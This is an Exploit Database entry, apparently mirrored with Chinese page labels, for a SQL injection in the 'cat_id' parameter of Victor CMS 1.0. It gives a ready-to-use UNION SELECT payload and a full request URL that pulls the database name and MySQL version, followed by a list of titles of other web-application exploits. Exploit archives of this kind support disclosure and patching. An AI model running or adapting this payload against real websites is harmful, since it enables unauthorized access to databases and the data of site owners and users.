Victor CMS 1.0 – ‘cat_id’ SQL Injection

Exploit Database
12 阅读

作者： Kishan Lal Choudhary

日期： 2020-05-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/48485/

# Exploit Title: Victor CMS 1.0 - 'cat_id' SQL Injection
# Google Dork: N/A
# Date: 2020-05-19
# Exploit Author: Kishan Lal Choudhary
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Windows 10

Description: The GET parameter 'category.php?cat_id=' is vulnerable to SQL Injection


Payload: UNION+SELECT+1,2,VERSION(),DATABASE(),5,6,7,8,9,10+--


http://localhost/category.php?cat_id=-1+UNION+SELECT+1,2,VERSION(),DATABASE(),5,6,7,8,9,10+--

By exploiting the SQL Injection vulnerability by using the mentioned payload, an attacker will be able to retrieve the database name and version of mysql running on the server.

last Exploits
Victor CMS 1.0 – ‘cat_id’ SQL Injection的更多信息

Yaws-Wiki 1.88-1 (Erlang) – Persistent / Reflective Cross-Site Scripting：
Bacula-Web 1.3.x < 5.0.3 - Multiple Vulnerabilities：
Esotalk CMS 1.0.0g4 – Cross-Site Scripting：
Firebook – ‘index.html’ Cross-Site Scripting：
Private Camera Pro 5.0 iOS – Multiple Vulnerabilities：
IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing – Arbitrary File Disclosure：
M/Monit 3.3.2 – Cross-Site Request Forgery：
DotNetNuke 6.1.x – Cross-Site Scripting：